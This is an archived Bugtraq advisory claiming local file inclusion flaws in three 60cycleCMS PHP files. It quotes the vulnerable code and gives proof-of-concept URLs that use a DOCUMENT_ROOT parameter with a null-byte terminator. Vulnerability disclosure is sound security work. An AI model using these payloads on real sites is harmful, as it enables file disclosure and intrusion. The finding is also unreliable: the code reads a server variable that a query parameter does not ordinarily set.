[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: 60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability
From: eidelweiss@xxxxxxxxxxxxxxxxx
Date: Tue, 13 Apr 2010 18:37:47 -0600

########################################################

[!] Descriptsion

60cycleCMS is a simple CMS using PHP and MySQL. It is designed for blogging on 
personal websites, and was first written to power 60cycle.net. 
For the purposes of easy integration into existing sites, 60cycleCMS does not 
include a web template. 


[!]-=[ Vuln C0de ]=-[!]

[-]  60cycleCMS_path/news.php

        <?php

        require 'common/lib.php';
        $root = $_SERVER['DOCUMENT_ROOT'];
        require_once("$root/../config.php");



[-] 60cycleCMS_path/submitComment.php

        <?php
        session_start();
        require_once('lib/recaptchalib.php');
        require_once('lib/htmlpurifier-4.0.0/HTMLPurifier.standalone.php');
        $root = $_SERVER['DOCUMENT_ROOT'];
        require_once("$root/../config.php");


[-] 60cycleCMS_path/common/sqlConnect.php

        <?php

        // include your sql info file here
        $root = $_SERVER['DOCUMENT_ROOT'];
        require "$root/../config.php";


        [!] -=[ Proof Of Concept ]=-[!]

        http://127.0.0.1/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00
        http://127.0.0.1/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= 
[LFI]%00
        http://127.0.0.1/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= 
[LFI]%00

########################################################

Prev by Date: [ MDVSA-2010:072 ] cups
Next by Date: [ MDVSA-2010:071 ] krb5
Previous by thread: [ MDVSA-2010:072 ] cups
Next by thread: [ MDVSA-2010:071 ] krb5
Index(es):
- Date
- Thread